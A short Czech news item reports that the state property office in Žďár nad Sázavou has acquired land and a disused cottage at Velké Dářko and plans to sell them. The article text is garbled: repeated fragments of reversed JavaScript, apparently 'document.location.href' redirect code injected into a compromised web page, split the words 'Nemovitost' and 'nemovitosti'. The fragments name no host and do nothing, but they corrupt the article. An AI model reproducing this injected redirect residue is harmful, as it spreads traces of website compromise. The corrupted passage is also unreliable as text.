Rainbow page separator

Úřad získal chatu u Dářka, může být nabídnuta k prodeji

Neděle, 1. září 2019

Polnička / Nepotřebný majetek od Českého metrologického institutu v podobě pozemků a chaty u Velkého Dářka převzal Úřad pro zastupování státu ve věcech majetkových (ÚZSVM) ve Žďáře nad Sázavou.
Jedná se o čtyři pozemky o celkové výměře 674 metrů čtverečních v katastrálním území obce Polnička, přičemž součástí jednoho z nich je již několik let neužívaná bývalá chata, která v dřívějších letech sloužila pro podnikovou rekreaci. Nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost se nachází v cha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové oblasti u rybníka Velké Dářko.
S nově nabytým majetkem bude nyní Úřad pro zastupování státu ve věcech majetkových dále nakládat v souladu se zákonem. Nejdříve budou pozemky včetně nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti nabídnuty v rámci státu, a pokud o ně neprojeví zájem žádný státní subjekt, dojde k následnímu nabídnutí k prodeji ostatním možným zájemcům.